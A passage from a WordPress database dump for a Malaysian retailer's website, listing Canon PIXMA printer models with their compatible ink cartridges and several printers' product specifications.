width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 15:37:00','2019-09-24 07:37:00','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (3292,1,'2019-09-24 15:35:20','2019-09-24 07:35:20','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>Â </p><p>Â </p><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>Â </p><p>Â </p><p>Â </p><p>Â </p><p>Â </p><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>&lt;center&gt;[maxbutton id=\"11\" ]&lt;/center&gt;</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and 